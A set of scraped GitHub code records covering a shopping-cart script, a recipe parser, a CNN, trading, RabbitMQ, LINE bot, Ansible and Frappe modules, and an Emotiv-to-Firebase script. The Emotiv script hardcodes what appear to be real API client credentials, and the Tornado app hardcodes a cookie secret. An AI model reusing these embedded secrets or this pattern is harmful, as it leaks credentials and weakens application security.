\"\"\"\n try:\n if temp == []:\n print(\"\\n====================\")\n print(\"\\\"Cart is empty\\\"\")\n if temp != []:\n order_del = input(\"To remove the entire order, enter - \\\"d\\\": \")\n if order_del == \"d\":\n temp.clear()\n for i in shopping:\n if i[\"Available\"] < c:\n i[\"Available\"] += 1\n print(\"=========================\")\n print(\"\\\"Cart has been emptied\\\"\")\n print(\"=========================\")\n else:\n print(\"\\n\\\"The items in the cart have not been removed\\\"\")\n print(\"\\\"Please select Cancel order and press - \\\"d\\\":\\n\")\n \n except UnboundLocalError:\n print(\"\\\"Please add an item\\\"\")\n print(\"======================\\n\")\n\n\ndef payOrder(temp):\n \"\"\"This function is responsible for the purchase of goods.\n \"\"\"\n sumTotal = 0\n if temp == []:\n print(\"\\n=================================\")\n print(\"Select a product and add to cart\")\n print(\"=================================\\n\")\n userDisplayMenuWindow()\n userWindow()\n userChoiceOptions()\n else:\n for i in temp:\n for key, value in i.items():\n if key == \"Available\":\n continue\n print(key, value)\n if key == \"Price\":\n sumTotal += i.get(\"Price\")\n print('==============')\n print(f\"Total cost: {sumTotal}\", \"\\n\")\n print(\"\\\"Thanks for shopping\\\"\\n\")\n\n\ndef placeOrder():\n \"\"\"This function is responsible for adding the product to the cart.\n \"\"\"\n order_number = 0\n userDisplayMenuWindow()\n p_id = int(input(\"\\nEnter the id : \"))\n\n for d in shopping:\n if d[\"id\"] == p_id:\n print(\"\\nId\\tName\\tAvailable\\tPrice\")\n print(\"=============================================================\")\n print(f'{d[\"id\"]}\\t{d[\"Name\"]}\\t{d[\"Available\"]}\\t\\t{d[\"Price\"]}')\n conform = input(\"\\nDo you want to place an order on the above shown product : Y/N \")\n \n if d[\"Available\"] == 0:\n print(\"\\n\"\"===============================\")\n print(\"\\\"This position is not available\\\"\")\n userWindow()\n userChoiceOptions()\n break\n \n if conform == 'Y' or conform == 'y':\n print(\"\\nSuccessfully placed the order on the product {} {}\".format(d[\"id\"], d[\"Name\"]))\n order_number += 1\n print(\"Your order number is : \", order_number, \"\\n\")\n global c\n c = d[\"Available\"]\n d[\"Available\"] -= 1\n temp.append(d)\n print(\"=============\")\n print(\"Shopping cart\")\n print(\"=============\")\n catalogView(temp)\n break\n\n elif conform == 'N' or conform == 'n':\n print(\"\\\"The order is not placed. You can carry on with you purchase. To add an order choose \\\"Place order.\\\"\\n\\\"Happy shopping!!!!\\\"\")\n break\n else:\n print(\"\\nYou have entered wrong option. Please enter again\\n\")\n conform = input(\"\\nDo you want to place an order on the above shown product : Y/N \")\n print(\"\\\"Please - enter the id :\\\"\\n\")\n placeOrder()\n break\n\n if d[\"id\"] != p_id:\n print(\"\\n\\\"You have entered invalid id. Please enter valid id\\\"\\n\")\n user_id()\n\n\ndef userChoiceOptions():\n \"\"\"This function is responsible for the choice of the user.\n \"\"\"\n try:\n choice = int(input(\"Please enter user choice : \"))\n if choice == 1:\n userDisplayMenuWindow()\n print(\"\\n===================================================\\n\")\n userWindow()\n print(\"\\n===================================================\\n\")\n userChoiceOptions()\n elif choice == 2:\n placeOrder()\n print(\"\\n===================================================\\n\")\n userWindow()\n print(\"\\n===================================================\\n\")\n userChoiceOptions()\n elif choice == 3:\n payOrder(temp)\n elif choice == 4:\n removeCart()\n userDisplayMenuWindow()\n userWindow()\n userChoiceOptions()\n elif choice == 5:\n print(\"\\n\\\"Thank you for visiting our shop.\\\"\\n\")\n exit()\n else:\n print(\"\\n\\\"Please enter valid choice\\\"\\n\")\n userWindow()\n userChoiceOptions()\n except ValueError:\n print(\"\\n\\\"Invalid Choice. Please enter valid choice\\\"\")\n userWindow()\n userChoiceOptions()\n","repo_name":"MikitaTsiarentsyeu/Md-PT1-50-22","sub_path":"Tasks/Vadeika/Task6/main_logic.py","file_name":"main_logic.py","file_ext":"py","file_size_in_byte":5239,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"10066379364","text":"import re\nimport spacy\n\nfrom METHODS import METHODS\nfrom fuzzywuzzy import fuzz\n\nnlp = spacy.load('en_core_web_sm')\n\ntest_ingredients = ['18 medium taco shells','2 pounds lean ground beef','1 (14 ounce) bottle ketchup','1 (8 ounce) package shredded Cheese','1 large tomato, diced','1 cup iceberg lettuce, shredded', '3 1/4 cups fusilli pasta','2 tablespoons butter','2 tablespoons all-purpose flour','2 cups milk','1 1/2 cups shredded Cheddar cheese, divided','3 teaspoons lemon juice','1/2 teaspoon mustard powder',' salt and ground black pepper to taste','15 ounces tuna packed in water, drained and flaked','1/4 cup dry bread crumbs']\n\ningred1 = ['18 medium taco shells','2 pounds lean ground beef','1 (14 ounce) bottle ketchup','1 (8 ounce) package shredded Cheese','1 large tomato, diced','1 cup iceberg lettuce, shredded']\ndirections1 = ['Preheat oven to 375 degrees F (190 degrees C).',\n 'Warm taco shells for 5 minutes on the center rack in the preheated oven.',\n 'In a medium skillet over medium high heat, brown the beef. Halfway through browning, pour in ketchup. Stir well and let simmer for 5 minutes.',\n 'Spoon the meat mixture into the warm taco shells and top with Cheddar cheese. Return the filled taco shells to the preheated oven and bake until cheese is melted. Top each taco with a little tomato and lettuce.']\n\nMEAT_SPECIFIC_VERBS = [ 'trim', 'trimmed']\n\ndef find_nouns(doc):\n nouns = []\n for tok in [tok for tok in doc if tok.dep_ == 'compound' and tok.pos_ != 'VERB']: # Get list of compounds in doc\n noun = doc[tok.i: tok.head.i + 1]\n nouns.append(str(noun))\n for tok in doc:\n if tok.pos_ == \"NOUN\" and len(tok.text) > 2:\n nouns.append(str(tok))\n return nouns\n\n\nclass Ingredient:\n def __init__(self, qty, unit, item, comments = None, qty_details = None, additional_prep = None):\n self.qty = qty\n self.qty_details = qty_details\n self.unit = unit\n self.item = item\n self.comments = comments\n self.additional_prep = additional_prep\n\n def show(self):\n print(' ')\n print('qty: ',self.qty,\n '\\nqty_details: ',self.qty_details,\n '\\nunit: ',self.unit,\n '\\nitem: ',self.item,\n '\\ncomment: ',self.comments, '\\n\\n')\n print(' ')\n print('--------------------------------')\n\nUNITWORDS = set(['can','jar','pound','ounce','cup','packet', 'package', 'bottle','pinch','teaspoon','tablespoon','head','bunch','bundle','leaves','leaf','leave','sprig','piece','spoonful','pint','quart','gallon','stalk','spear','sheet','bar','cube','block','loaf','wheel','slice','ear','pod','clove','cluster'])\nTOOLS = set(['pan','pot','oven','bowl','blender','wok','skillet','fryer','grill','steamer','cooker','range','maker','iron'])\nTIME = set(['hour','minute','second','overnight'])\nMETHODS = set(METHODS)\n\ndef cut_s(string):\n s = string\n if s.endswith('s'): s = s[:-1]\n return(s)\n\ndef str_to_frac(string):\n t = string.split('/')\n return round(int(t[0])/int(t[1]),2)\n\ndef parse_additional_prep(item):\n if ',' in item:\n comment = item.split(',')[-1]\n doc = nlp(comment)\n for tok in doc:\n if tok.text in MEAT_SPECIFIC_VERBS:\n return ''\n if tok.pos_ == 'VERB':\n return ',' + comment\n return ''\n\n\n\ndef parse_ingredients(ingreds):\n paren_pat = re.compile(r'\\((.*?)\\)')\n\n parsed_ingreds = []\n\n for line in ingreds:\n # all the vars we need for Ingredient class\n qty = 0\n qty_details = ''\n unit = ''\n item = ''\n comments = ''\n\n # look for parentheses, take them out, place whats in them in the qty_details\n if re.search(paren_pat,line):\n qty_details = re.search(paren_pat,line).group(0)\n qty_details = qty_details[1:len(qty_details)-1]\n line = re.sub(r'\\((.*?)\\)', '', line)\n\n\n # look for numbers, put them in qty\n number = re.search('\\d*\\s*[^A-Za-z]*', line).group(0)\n for num in number.split():\n if '/' in num:\n num = str_to_frac(num)\n else:\n num = int(num)\n qty = qty + num\n if qty == 0:\n qty = ''\n\n line = re.sub('[0-9]+\\s*[^A-Za-z]*', '', line)\n\n # look for unit words\n if cut_s(line.split()[0]) in UNITWORDS:\n unit = line.split()[0]\n line = ' '.join(line.split()[1:])\n\n item = line\n # # split string on ',' for item and comment\n # if re.search('to taste', line):\n # line = re.sub('to taste', ' ', line)\n # comments += 'to taste'\n # line = line.split(',')\n # item = line[0]\n # try:\n # comments += line[1]\n # except: pass\n additional_prep = parse_additional_prep(line)\n\n\n parsed_ingreds.append(Ingredient(qty,unit,item,comments,qty_details, additional_prep = additional_prep))\n\n return(parsed_ingreds)\n\n\n# parsed = parse_ingredients(test_ingredients)\n\n# for i in parsed:\n# i.show()\n\nclass Main_step:\n def __init__(self):\n self.source = None\n self.substeps = None\n\n def show(self):\n print(\"----------MAIN STEP--------------\\n\")\n print(\"Source: \", self.source)\n print(' ')\n for ss in self.substeps:\n ss.show()\n\n\nclass Sub_step:\n def __init__(self, ingredients = None, tools=None, time=None, method=None,source = None):\n self.source = source\n self.method = method\n self.ingredients= ingredients\n self.tools = tools\n self.time = time\n\n def show(self):\n print(\" ----------SUB STEP--------------\\n\")\n print(' source: ', self.source)\n print(' method: ', self.method)\n print(' ingredients: ', self.ingredients)\n print(' tools: ', self.tools)\n print(' time: ', self.time)\n print(' ')\n\n# INGREDS = parse_ingredients(ingreds)\n\ndef split_into_substeps(directions):\n split_steps = []\n\n for step in directions:\n main = Main_step()\n main.source = step\n parsed_substeps = []\n\n for substep in step.split('.')[:-1]:\n ss_obj = Sub_step()\n ss_obj.source = substep\n parsed_substeps.append(ss_obj)\n\n main.substeps = parsed_substeps\n split_steps.append(main)\n return split_steps\n\ndef substeps_with_addons(directions, ingredient_objs):\n split_steps = []\n ingredient_nouns = sorted(set([i.item for i in ingredient_objs]), key=len)\n\n for step in directions:\n main = Main_step()\n main.source = step\n parsed_substeps = []\n\n for substep in step.split('.')[:-1]:\n #actual step\n ss_obj = Sub_step()\n ss_obj.source = substep\n \n \n nouns = []\n doc = nlp(substep)\n nouns += find_nouns(doc)\n \n sorted_nouns = sorted(set(nouns), key=len, reverse=True)\n \n #ingredients in each step\n mappings = []\n for noun in sorted_nouns:\n for i in ingredient_nouns:\n if fuzz.partial_ratio(noun, i) > 90 and len(noun) <= len(i):\n mappings.append(noun)\n \n ss_obj.ingredients = mappings\n \n #find tools\n tools = []\n for word in substep.split():\n if cut_s(word).lower() in TOOLS:\n tools.append(word)\n ss_obj.tools = tools\n \n #time\n time = []\n for i in range(len(substep.split())):\n word = substep.split()[i].lower()\n if cut_s(word) in TIME:\n if word == 'overnight':\n time.append('overnight')\n else:\n prev = ''\n try:\n prev = substep.split()[i-1]\n except: \n prev = 'a couple'\n time.append(prev + ' ' + word)\n ss_obj.time = time\n \n methods = []\n for word in substep.split():\n \n if word.capitalize() in METHODS:\n methods.append(word)\n ss_obj.method = methods\n \n parsed_substeps.append(ss_obj)\n\n main.substeps = parsed_substeps\n split_steps.append(main)\n return split_steps\n\ndef compute_ingredient_name_mappings(ingredient_objs, steps):\n ingredient_nouns = sorted(set([i.item for i in ingredient_objs]), key=len)\n nouns = []\n for step in steps:\n for ss in step.substeps:\n doc = nlp(ss.source)\n nouns += find_nouns(doc)\n\n sorted_nouns = sorted(set(nouns), key=len, reverse=True)\n\n mappings = []\n for noun in sorted_nouns:\n for i in ingredient_nouns:\n if fuzz.partial_ratio(noun, i) > 90 and len(noun) <= len(i):\n mappings.append((noun, i))\n return mappings\n","repo_name":"sdobon/NLP-recipe-transformer","sub_path":"parsers2.py","file_name":"parsers2.py","file_ext":"py","file_size_in_byte":9139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31752034940","text":"import torch\nimport torch.nn as nn\n\n\nclass CNN(nn.Module):\n def __init__(self, p, a, b):\n super().__init__()\n\n layers = []\n for i in range(3 * a):\n in_channels = p if i == 0 else 32 * b\n layers += [\n nn.Conv1d(in_channels=in_channels, out_channels=32 * b, kernel_size=p, padding='same'),\n nn.ReLU(),\n nn.BatchNorm1d(32 * b)\n ]\n\n self.__block1 = nn.Sequential(*layers)\n\n layers = []\n for i in range(3 * a):\n in_channels = 1 if i == 0 else 32 * b\n\n layers += [\n nn.Conv2d(in_channels=in_channels, out_channels=32 * b, kernel_size=(3, 3), padding='same'),\n nn.ReLU(),\n nn.BatchNorm2d(32 * b)\n ]\n\n self.__block2 = nn.Sequential(*layers)\n\n layers = [\n # nn.AvgPool2d(kernel_size=(32 * b)),\n nn.Linear(32 * b * p, 2),\n nn.Sigmoid(),\n ]\n\n self.__block3 = nn.Sequential(*layers)\n\n def forward(self, bs_location: torch.Tensor, angles: list[torch.Tensor], toa: torch.Tensor):\n x = torch.cat([toa[:, :, None], bs_location[:, :, :2], *angles], dim=2)\n\n x = torch.permute(x, (0, 2, 1))\n\n x = x[:, None, :, :]\n\n x = self.__block2(x)\n\n x = torch.mean(x, dim=-1)\n x = torch.flatten(x, start_dim=1)\n\n out = self.__block3(x)\n\n return out\n","repo_name":"YerevaNN/NLOS-Localization-WAIR-D","sub_path":"src/networks/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41719910497","text":"import firebase_admin\nfrom firebase_admin import credentials, db\n\nfrom cortex import Cortex\n\nclass LiveMode():\n def __init__(self, app_client_id, app_client_secret, **kwargs):\n self.c = Cortex(app_client_id, app_client_secret, debug_mode = False, **kwargs)\n\n self.c.bind(create_session_done = self.on_create_session_done)\n self.c.bind(query_profile_done = self.on_query_profile_done)\n self.c.bind(load_unload_profile_done = self.on_load_unload_profile_done)\n self.c.bind(save_profile_done = self.on_save_profile_done)\n\n self.c.bind(new_com_data = self.on_new_com_data)\n self.c.bind(new_met_data = self.on_new_met_data)\n\n def start(self, profile_name, headsetId = ''):\n if profile_name == '':\n raise ValueError('Empty profile_name. The profile_name cannot be empty.')\n\n self.profile_name = profile_name\n self.c.set_wanted_profile(profile_name)\n\n if headsetId != '':\n self.c.set_wanted_headset(headsetId)\n\n self.c.open()\n\n def load_profile(self, profile_name):\n self.c.setup_profile(profile_name, 'load')\n\n def unload_profile(self, profile_name):\n self.c.setup_profile(profile_name, 'unload')\n\n def save_profile(self, profile_name):\n self.c.setup_profile(profile_name, 'save')\n\n # Callbacks functions\n def on_create_session_done(self, *args, **kwargs):\n self.c.query_profile()\n\n def on_query_profile_done(self, *args, **kwargs):\n self.profile_lists = kwargs.get('data')\n\n if self.profile_name in self.profile_lists:\n self.c.get_current_profile()\n else:\n self.c.setup_profile(self.profile_name, 'create')\n\n def on_load_unload_profile_done(self, *args, **kwargs):\n is_loaded = kwargs.get('isLoaded')\n print(\"on_load_unload_profile_done: \" + str(is_loaded))\n \n if is_loaded == True:\n self.save_profile(self.profile_name)\n else:\n print('The profile ' + self.profile_name + ' is unloaded')\n self.profile_name = ''\n\n def on_save_profile_done (self, *args, **kwargs):\n print('Save profile ' + self.profile_name + \" successfully\")\n\n stream = ['com', 'met']\n self.c.subscribe_request(stream)\n\n def on_new_met_data(self, *args, **kwargs):\n data = kwargs.get('data')\n\n if data['met'][11] == True:\n state = \"focus\"\n elif data['met'][7] == True:\n state = \"relaxation\"\n elif data['met'][5] == True:\n state = \"stress\"\n \n ref = db.reference('/')\n ref.update({\n 'met/state': state\n })\n \n def on_new_com_data(self, *args, **kwargs):\n data = kwargs.get('data')\n action = data['action']\n\n ref = db.reference('/')\n ref.update({\n 'com/action': action\n })\n\ndef main():\n Firebase_credentials = credentials.Certificate('Firebase_credentials.json')\n\n firebase_admin.initialize_app(Firebase_credentials, {\n 'databaseURL': \"https://raspberrypi-health-default-rtdb.asia-southeast1.firebasedatabase.app/\"\n })\n\n your_app_client_id = 'TT5dWgW0bgYlQgZ6UKWFUbePXsQQ05p4v5ydoWl1'\n your_app_client_secret = 'XPTyv26CgjTcVSBGJJBiVsj3hY1xAvsZK48GkVFgIuZp5WpuuR4S0reujyvLKkKDYDTz4gOSLHNejhXHV4sxnFptPBvdKfyzsNKlUk54p0HMWqMveIPSLBcDjZV4GZfk'\n \n trained_profile_name = 'BCI'\n\n l = LiveMode(your_app_client_id, your_app_client_secret)\n l.start(trained_profile_name)\n\nif __name__ == '__main__':\n main()\n","repo_name":"tanhtr/Healthcare","sub_path":"live_mode.py","file_name":"live_mode.py","file_ext":"py","file_size_in_byte":3550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71459055507","text":"# viewPositions.py\n# 2022-07-19 created by ClimberMel\n# Used content from getPositions and getHoldings variations\n# I have removed all the unneeded code for just viewing and writing to csv all my combined holdings.\n# This currently (2022-11-20) both displays in a dataframe and writes it out to a CSV file\n# 2023-04-03: Modified to use new parms.json format for connection\n\nfrom ib_insync import *\nimport pandas as pd\nimport datetime as dt\nimport file\n\nparms = file.read_json(\"parms/parms.json\")\npconnect = parms['connect']\n\nib = IB()\nib.connect(pconnect[\"ip\"], pconnect[\"port\"], clientId=pconnect[\"id\"])\n\npos = ib.positions()\n\nposition = [] # temporary list to hold element from pos during parsing\nmyPositions = [] # create a list of my combined positions\n\nheader = ['Account', 'Alias', 'secType', 'conId', 'Symbol', 'Exchange', 'Currency', 'localSymbol', 'tradingClass', 'Position', 'avgCost', 'ContractMonth', 'Strike', 'Right', 'Multiplier']\nx = dt.datetime.now() # get current datetime\nnow_str = x.strftime('%Y-%m-%d_%H-%M')\n\naccounts = file.read_json(\"parms/accounts.json\")\n\n#None can be used as a place holder for rows that have missing elements\nfor s in pos:\n position.clear\n if s.contract.secType == 'STK':\n position = [s.account, accounts[s.account], s.contract.secType, s.contract.conId, s.contract.symbol, s.contract.exchange, s.contract.currency, s.contract.localSymbol, s.contract.tradingClass, s.position, s.avgCost, None, None, None, None]\n myPositions.append(position)\n elif s.contract.secType == 'OPT':\n position = [s.account, accounts[s.account], s.contract.secType, s.contract.conId, s.contract.symbol, None, s.contract.currency, s.contract.localSymbol, s.contract.tradingClass, s.position, s.avgCost, s.contract.lastTradeDateOrContractMonth, s.contract.strike, s.contract.right, s.contract.multiplier]\n myPositions.append(position)\n elif s.contract.secType == 'CASH':\n position = [s.account, accounts[s.account], s.contract.secType, s.contract.conId, s.contract.symbol, None, None, s.contract.localSymbol, s.contract.tradingClass, s.position, s.avgCost, None, None, None, None]\n myPositions.append(position)\n else: print('ERROR: '.join(position))\n\nprint('Start process')\n\npositions = pd.DataFrame(myPositions, columns = header)\n\n# Using DataFrame.to_string() to print without index\ndfh = positions.to_string(index=False)\n\n# Write DataFrame to CSV File with Default params.\noutput_folder = 'output/'\npositions.to_csv(output_folder + now_str + \" positions.csv\", index=False)\n\nprint(dfh)\n\nprint('End process. File saved to: ' + output_folder + now_str + \" positions.csv\")\nib.disconnect()\n","repo_name":"ClimberMel/ib_tools","sub_path":"code/positions_toCSV.py","file_name":"positions_toCSV.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"36063499615","text":"import json\r\nimport os\r\n\r\nimport pika\r\n\r\nimport tornado.httpserver\r\nimport tornado.ioloop\r\nimport tornado.options\r\nimport tornado.web\r\n\r\nAMQP_URL = os.environ.get('AMQP_URL')\r\n\r\nclass PikaClient:\r\n def __init__(self, queue):\r\n self.queue = queue\r\n parametrs = pika.URLParameters(AMQP_URL)\r\n self.connection = pika.BlockingConnection(parametrs)\r\n self.channel = self.connection.channel()\r\n self.channel.queue_declare(queue=self.queue, durable=True)\r\n\r\n def message_send(self, json_data):\r\n self.channel.basic_publish(exchange='',\r\n routing_key=self.queue,\r\n body=json_data,\r\n properties=pika.BasicProperties(\r\n delivery_mode=pika.spec.PERSISTENT_DELIVERY_MODE\r\n ))\r\n\r\n def connection_off(self):\r\n self.connection.close()\r\n\r\n\r\nclass Application(tornado.web.Application):\r\n def __init__(self):\r\n handlers = [\r\n (r\"/\", RootHandler),\r\n (r\"/send\", SendHandler),\r\n ]\r\n settings = dict(\r\n template_path=\"./src/templates/\",\r\n static_path=\"./src/static/\",\r\n xsrf_cookies=True,\r\n cookie_secret=\"262b44b297e695f78dcff3b56c8f43ac36235696\"\r\n )\r\n tornado.web.Application.__init__(self, handlers, **settings)\r\n\r\n\r\nclass RootHandler(tornado.web.RequestHandler):\r\n def get(self):\r\n self.render(\"rootHandler.html\")\r\n\r\n\r\nclass SendHandler(tornado.web.RequestHandler):\r\n def post(self):\r\n data = {'last_name': self.get_argument(\"last-name\", default=None, strip=False),\r\n 'first_name': self.get_argument(\"first-name\", default=None, strip=False),\r\n 'patronymic': self.get_argument(\"patronymic\", default=None, strip=False),\r\n 'phone': self.get_argument(\"phone\", default=None, strip=False),\r\n 'complaint_text': self.get_argument(\"appeal\", default=None, strip=False)}\r\n json_data = json.dumps(data, ensure_ascii=False).encode(\"UTF-8\")\r\n\r\n self.write(f\"На сервер отправлено:{json_data.decode()}\")\r\n\r\n # Message initialization\r\n message = PikaClient(queue=\"task_queue\")\r\n message.message_send(json_data=json_data)\r\n message.connection_off()\r\n\r\n self.set_status(202)\r\n\r\n\r\ndef main():\r\n print('services running, press ctrl+c to stop')\r\n ioloop = tornado.ioloop.IOLoop.instance()\r\n app = Application()\r\n\r\n app.listen(80, \"0.0.0.0\")\r\n ioloop.start()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"GlukVet/WebApplication","sub_path":"backend/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13296122399","text":"from game import Game2v2\n\ngame = Game2v2()\ngame.show_cards()\n\nid = 0\n\nlast_play_id = -1\n\nwhile(True):\n if last_play_id==id:\n game.new_turn()\n print(\"trun of player\", id)\n cards = game.see_cards(id)\n print(\"cards of player\", id, \":\", cards)\n if game.check_play(id):\n print(\"can play a card\")\n card = game.play_card(id)\n print(\"play card: \", card)\n last_play_id = id\n if game.check_win()>-1:\n break\n id = id+1 if id<3 else 0\n\nprint(\"winner: player\", id)","repo_name":"SakuraDawnRain/RLNPC","sub_path":"play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24839450336","text":"import json\n\n# import requests\n\nfrom linebot import (\n LineBotApi, WebhookHandler\n)\nfrom linebot.exceptions import (\n InvalidSignatureError\n)\nfrom linebot.models import (\n MessageEvent, TextMessage, TextSendMessage,ImageMessage\n)\n\nfrom linebot.models import (FollowEvent,UnfollowEvent)\nfrom controllers.line_bot_handler import LineBotController\nimport os\nimport watchtower, logging\n\nline_bot_api = LineBotApi(os.environ.get('LINE_CHANNEL_ACCESS_TOKEN'))\nhandler = WebhookHandler(os.environ.get('LINE_CHANNEL_SECRET'))\n\n# log 紀錄\nlogging.basicConfig(level=logging.INFO)\nline_logger = logging.getLogger(\"ncu_ai_serverless_line_event\")\nline_logger.addHandler(watchtower.CloudWatchLogHandler())\n\ndef lambda_handler(event, context):\n\n # get X-Line-Signature header value\n signature = event.get(\"headers\").get('X-Line-Signature')\n if signature is None:\n signature = event.get(\"headers\").get('x-line-signature')\n\n # get request body as text\n body = event.get(\"body\")\n line_logger.info(body)\n # handle webhook body\n try:\n print(body)\n handler.handle(body, signature)\n except InvalidSignatureError:\n print(\"Invalid signature. Please check your channel access token/channel secret.\")\n\n return {\n \"statusCode\": 200,\n \"body\": json.dumps(\n {\n \"message\": \"hello world\",\n # \"location\": ip.text.replace(\"\\n\", \"\")\n }\n ),\n }\n\n@handler.add(FollowEvent)\ndef handle_line_follow(event):\n return LineBotController.follow_event(event)\n\n@handler.add(UnfollowEvent)\ndef handle_line_unfollow(event):\n return LineBotController.unfollow_event(event)\n\n\n@handler.add(MessageEvent, message=TextMessage)\ndef handle_message(event):\n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(text=event.message.text))\n\n@handler.add(MessageEvent, message=ImageMessage)\ndef handle_message(event):\n return LineBotController.image_event(event)\n\n","repo_name":"BingHongLi/ncu-ai-serverless-bot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21900087334","text":"from __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\nDOCUMENTATION = '''\n---\nmodule: pn_prefix_list_network\nauthor: \"Pluribus Networks (@rajaspachipulusu17)\"\nshort_description: CLI command to add/remove prefix-list-network\ndescription:\n - This module is used to add network associated with prefix list\n and remove networks associated with prefix list.\noptions:\n pn_cliswitch:\n description:\n - Target switch to run the CLI on.\n required: false\n type: str\n state:\n description:\n - State the action to perform. Use C(present) to create\n prefix-list-network and C(absent) to delete prefix-list-network.\n required: true\n type: str\n choices: ['present', 'absent']\n pn_netmask:\n description:\n - netmask of the network associated the prefix list.\n required: false\n type: str\n pn_name:\n description:\n - Prefix List Name.\n required: false\n type: str\n pn_network:\n description:\n - network associated with the prefix list.\n required: false\n type: str\n'''\n\nEXAMPLES = \"\"\"\n- name: Prefix list network add\n community.network.pn_prefix_list_network:\n pn_cliswitch: \"sw01\"\n pn_name: \"foo\"\n pn_network: \"172.16.3.1\"\n pn_netmask: \"24\"\n state: \"present\"\n\n- name: Prefix list network remove\n community.network.pn_prefix_list_network:\n pn_cliswitch: \"sw01\"\n state: \"absent\"\n pn_name: \"foo\"\n pn_network: \"172.16.3.1\"\n pn_netmask: \"24\"\n\"\"\"\n\nRETURN = \"\"\"\ncommand:\n description: the CLI command run on the target node.\n returned: always\n type: str\nstdout:\n description: set of responses from the prefix-list-network command.\n returned: always\n type: list\nstderr:\n description: set of error responses from the prefix-list-network command.\n returned: on error\n type: list\nchanged:\n description: indicates whether the CLI caused changes on the target.\n returned: always\n type: bool\n\"\"\"\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible_collections.community.network.plugins.module_utils.network.netvisor.pn_nvos import pn_cli, run_cli\nfrom ansible_collections.community.network.plugins.module_utils.network.netvisor.netvisor import run_commands\n\n\ndef check_cli(module, cli):\n \"\"\"\n This method checks for idempotency using prefix-list-network-show command.\n If network exists, return as True else False.\n :param module: The Ansible module to fetch input parameters\n :param cli: The CLI string\n \"\"\"\n name = module.params['pn_name']\n network = module.params['pn_network']\n show = cli\n\n cli += ' prefix-list-show format name no-show-headers'\n out = run_commands(module, cli)[1]\n\n if name not in out.split()[-1]:\n module.fail_json(\n failed=True,\n msg='Prefix list with name %s does not exists' % name\n )\n\n cli = show\n cli += ' prefix-list-network-show name %s format network no-show-headers' % name\n rc, out, err = run_commands(module, cli)\n\n if out:\n out = out.split()[-1]\n return True if network in out.split('/')[0] else False\n\n return False\n\n\ndef main():\n \"\"\" This section is for arguments parsing \"\"\"\n\n state_map = dict(\n present='prefix-list-network-add',\n absent='prefix-list-network-remove'\n )\n\n module = AnsibleModule(\n argument_spec=dict(\n pn_cliswitch=dict(required=False, type='str'),\n state=dict(required=True, type='str',\n choices=state_map.keys()),\n pn_netmask=dict(required=False, type='str'),\n pn_name=dict(required=False, type='str'),\n pn_network=dict(required=False, type='str'),\n ),\n required_if=(\n [\"state\", \"present\", [\"pn_name\", \"pn_network\", \"pn_netmask\"]],\n [\"state\", \"absent\", [\"pn_name\", \"pn_network\", \"pn_netmask\"]],\n ),\n required_together=(\n [\"pn_network\", \"pn_netmask\"],\n ),\n )\n\n # Accessing the arguments\n cliswitch = module.params['pn_cliswitch']\n state = module.params['state']\n netmask = module.params['pn_netmask']\n name = module.params['pn_name']\n network = module.params['pn_network']\n\n command = state_map[state]\n\n # Building the CLI command string\n cli = pn_cli(module, cliswitch)\n\n NETWORK_EXISTS = check_cli(module, cli)\n cli += ' %s ' % command\n\n if command == 'prefix-list-network-remove':\n if NETWORK_EXISTS is False:\n module.exit_json(\n skipped=True,\n msg='Prefix list with network %s does not exist' % network\n )\n\n if command == 'prefix-list-network-add':\n if NETWORK_EXISTS is True:\n module.exit_json(\n skipped=True,\n msg='Prefix list with network %s already exists' % network\n )\n\n if name:\n cli += ' name ' + name\n if network:\n cli += ' network ' + network\n if netmask:\n cli += ' netmask ' + netmask\n\n run_cli(module, cli, state_map)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ansible-collections/community.network","sub_path":"plugins/modules/pn_prefix_list_network.py","file_name":"pn_prefix_list_network.py","file_ext":"py","file_size_in_byte":5044,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"48"} +{"seq_id":"35196461579","text":"import frappe\nfrom frappe import _\nfrom frappe.contacts.address_and_contact import load_address_and_contact\nfrom frappe.utils import get_url\nfrom frappe.website.website_generator import WebsiteGenerator\n\n\nclass GrantApplication(WebsiteGenerator):\n\t_website = frappe._dict(\n\t\tcondition_field = \"published\",\n\t)\n\n\tdef validate(self):\n\t\tif not self.route:\t#pylint: disable=E0203\n\t\t\tself.route = 'grant-application/' + self.scrub(self.name)\n\n\tdef onload(self):\n\t\t\"\"\"Load address and contacts in `__onload`\"\"\"\n\t\tload_address_and_contact(self)\n\n\tdef get_context(self, context):\n\t\tcontext.no_cache = True\n\t\tcontext.show_sidebar = True\n\t\tcontext.parents = [dict(label='View All Grant Applications',\n\t\t\troute='grant-application', title='View Grants')]\n\ndef get_list_context(context):\n\tcontext.allow_guest = True\n\tcontext.no_cache = True\n\tcontext.no_breadcrumbs = True\n\tcontext.show_sidebar = True\n\tcontext.order_by = 'creation desc'\n\tcontext.introduction ='''\n\t\tApply for new Grant Application'''\n\n@frappe.whitelist()\ndef send_grant_review_emails(grant_application):\n\tgrant = frappe.get_doc(\"Grant Application\", grant_application)\n\turl = get_url('grant-application/{0}'.format(grant_application))\n\tfrappe.sendmail(\n\t\trecipients= grant.assessment_manager,\n\t\tsender=frappe.session.user,\n\t\tsubject='Grant Application for 